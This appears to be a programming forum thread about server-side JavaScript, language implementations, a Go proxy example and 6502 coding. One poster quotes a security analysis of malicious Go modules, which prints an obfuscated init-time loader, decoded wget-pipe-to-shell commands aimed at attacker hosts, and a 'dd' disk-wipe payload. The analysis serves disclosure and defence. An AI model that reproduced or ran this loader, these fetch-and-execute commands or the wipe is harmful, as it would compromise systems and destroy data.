A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
This feels like a really bonkers claim.
Why do people use Javascript for server side stuff? Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to set up a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work, then they can find someone who understands this shit.

im no genius but id assume it has something to do with everything looking like a nail. like for example, lets say youre a back end web dev who knows a lot of php. if php was able to do front end development (idk if it can, ive never used php) chances are if you wanted more work you'd use it instead of learning something new, wouldnt you?
Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how Rust only has one, the official one). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?

Because then you'd be stuck with the quirks of whatever that one implementation does, which ossify into a sort of informal standard regardless of what the actual language standards (if they even exist) say. Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like idiots.
It's now a veritable monstrosity of countless variables and functions twisting around each other across countless files and subfolders.

That's a cool vaguepost, but I'm dying to hear some specifics.
IDK, what do you think happens if you build up a binary pattern signature database for 20 years and never remove anything?

From what I've heard it was due to the language being used early on by multiple pieces of malware, and thus patterns from the compiler's output being thrown into AV heuristic databases. Though it's still ridiculous.
im no genius but id assume it has something to do with everything looking like a nail. [...]

I agree, it's just convenience or laziness or both. The logic is "hey, I know JS, I can write backend code in JS, guess I'll go with JS on the backend too."
Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like idiots.

If this were actually true, we wouldn't still be in compatibility hell with compiled langs.
Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?

The overall reading comprehension ability in this thread is taking a sharp decline.
Why do people use Javascript for server side stuff? [...]

If everything is written in one language, you'll have an easier time maintaining and expanding the codebase later, because future developers won't need to know multiple languages. This is especially a benefit in JS because it's a very common language. I'd say you get type transparency between modules, but in practice, all this really means is native ingestion of JSON on both ends, which isn't all that special anymore.
[...] I use it for server side rendering for pages where JS fetch & render is too slow (or too late in the page rendering process). For instance, for SEO purposes [...]

This is a solved problem in the world of JS in the form of SSR, but I can certainly understand a preference not to hitch your wagon to any particular JS framework, as they're extremely heavy, committal, and fickle in the sense that future updates will invalidate your codebase in at most 5 years.
Also, the CORS thing is a requirement for asynchronously calling an API from the browser. It has nothing to do with the server-side language at all.

That's what all the docs tell me, but this is a server-side component that was failing. If I used https://api/.... it was broken; if I added https://api to the local proxy and then used http://localhost/proxy/api, it worked. Maybe some weird glitch in one of the 2000 node packages this thing pulled in.
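For what it's worth, the "stick a local proxy in front of the API" workaround is a generic pattern rather than anything Node-specific. Below is a minimal sketch of it in Go (the upstream URL, the port, and the /proxy/api prefix are placeholders, not the actual setup from the post above): the page talks to a same-origin path, so the browser never makes a cross-origin request, and the proxy forwards to the real API.

Go:
package main

import (
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

func main() {
	// Placeholder upstream; a stand-in for whatever https://api/... actually points at.
	upstream, err := url.Parse("https://api.example.com")
	if err != nil {
		log.Fatal(err)
	}

	proxy := httputil.NewSingleHostReverseProxy(upstream)
	director := proxy.Director
	proxy.Director = func(req *http.Request) {
		director(req)
		req.Host = upstream.Host // some APIs reject requests whose Host header doesn't match
	}

	// The front end calls http://localhost:8080/proxy/api/... (same origin as the page),
	// so there is no cross-origin request and no CORS preflight to get wrong.
	http.Handle("/proxy/api/", http.StripPrefix("/proxy/api", proxy))
	log.Fatal(http.ListenAndServe("localhost:8080", nil))
}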
Searching for packages on https://pkg.go.dev can yield a minefield of random forks and shit. You can usually tell which are the main ones based on the "Imported by" count, but you could easily fake that by creating a shitload of dummy repos that import your malicious package. tbh I find most of the go packages I use from their github links in google/bing/wtf search results. Not sure what the best solution to this issue is, given the decentralized design of go's packaging system.

In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:
- github[.]com/truthfulpharm/prototransform
- github[.]com/blankloggia/go-mcp
- github[.]com/steelpoor/tlsproxy

Despite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket's scanners flagged the suspicious behaviors, leading us to a deeper investigation.
Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature where modules are directly imported from GitHub repositories creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to identify legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.
Obviously, any programmer worth his salt would see a function like that, do a 360, and find a different library, but they're relying on the fact that hardly anyone reads the source of everything they import.

Attackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here's how one malicious module (truthfulpharm/prototransform) executed this trick:
C-like:
func eGtROk() error {
	DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
	pBRPhsxN := runtime.GOOS == "linux"
	bcbGOM := "/bin/sh"
	vpqIU := "-c"
	PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] +
		DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
	if pBRPhsxN {
		exec.Command(bcbGOM, vpqIU, PWcf).Start()
	}
	return nil
}

var GEeEQNj = eGtROk()
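Not part of the article, but for anyone curious: the quickest way to see what a blob like this builds is to replay the concatenation and print the result instead of handing it to /bin/sh. A minimal sketch in Go, with the array and the index order copied from the snippet above:

Go:
// Rebuilds the string hidden in the array above and prints it, rather than executing it.
package main

import "fmt"

func main() {
	DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
	// Same index order as the PWcf concatenation in the malicious function.
	order := []int{11, 5, 47, 32, 29, 50, 16, 2, 43, 17, 66, 24, 40, 39, 45, 12, 4, 36, 49, 13, 15, 46, 20, 63, 0, 26, 60, 52, 65, 22, 56, 48, 54, 58, 31, 53, 3, 35, 51, 57, 7, 59, 21, 14, 25, 55, 30, 33, 23, 27, 42, 41, 19, 10, 8, 6, 67, 62, 9, 1, 37, 34, 38, 61, 18, 28, 64, 44}
	cmd := ""
	for _, i := range order {
		cmd += DmM[i]
	}
	fmt.Println(cmd) // prints the embedded wget ... | /bin/sh one-liner instead of running it
}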
Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.
Decoded Malicious Commands:
Bash:
# prototransform module payload
wget -O - https://vanartest[.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - https://kaspamirror[.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - http://147.45.44[.]41/storage/de373d0df/ccd7b46d | /bin/sh &
Decoded Intent:
- Fetches a destructive shell script (done.sh) from the attacker-controlled URL:
- https://vanartest[.]website/storage/de373d0df/a31546bf
- Executes it immediately, leaving virtually no time for response or recovery.
Similar URLs extracted from the other malicious modules (now offline):
- https://kaspamirror[.]icu/storage/de373d0df/a31546bf
- http://147.45.44[.]41/storage/de373d0df/ccd7b46d
Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:
done.sh – The destructive payload:
Bash:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync
The dd command would need root to overwrite the device like that, but it's not all that unlikely given the widespread use of go-based stuff on servers. Though you don't get the same sort of damage if you're running through docker or similar. I'm not super worried by this, but I thought it was interesting nonetheless.

dd if=/dev/zero of=/dev/sda bs=1M conv=fsync

Nice try, this is why I only use NVMe drives.
The dd command would need root to overwrite the device like that, but that's not super unlikely given the widespread use of go-based stuff on servers.
amen to that. Since i started using C and now most recently Java i feel id appreciate a language with the readability of python and the rigid syntax rules of C

When C's syntax is so rigid that it allows for uncountably infinite variations of undefined behaviour.
A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.

GCC and LLVM are only separate because RMS couldn't be bothered to check his email. LLVM was offered as a donation to the GNU project, directly to RMS, but he simply didn't see the email. The differences between the compilers these days are pretty small; the same people work on both and port every new optimisation to both compilers.
Real programmers use assembly~

I enjoy me some 6502 action. Unrolling loops to make things run smoothly is fun. I'm far from a real programmer tho.
recently i've taken the lazy approach of using a high level language for a 6502 machine
That's actually very interesting, and one can always inline asm for the stuff that really matters anyway. I'll have to try it out, cheers.
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos despite the fact that it doesn't really optimize the code that much
The 6502 is markedly better for using HLLs on than its contemporaries like the 8080/Z80. 6502 ASM has often been compared to writing microcode directly, since it's so minimal that the majority of programmers essentially build their own ad-hoc register file in the zero page.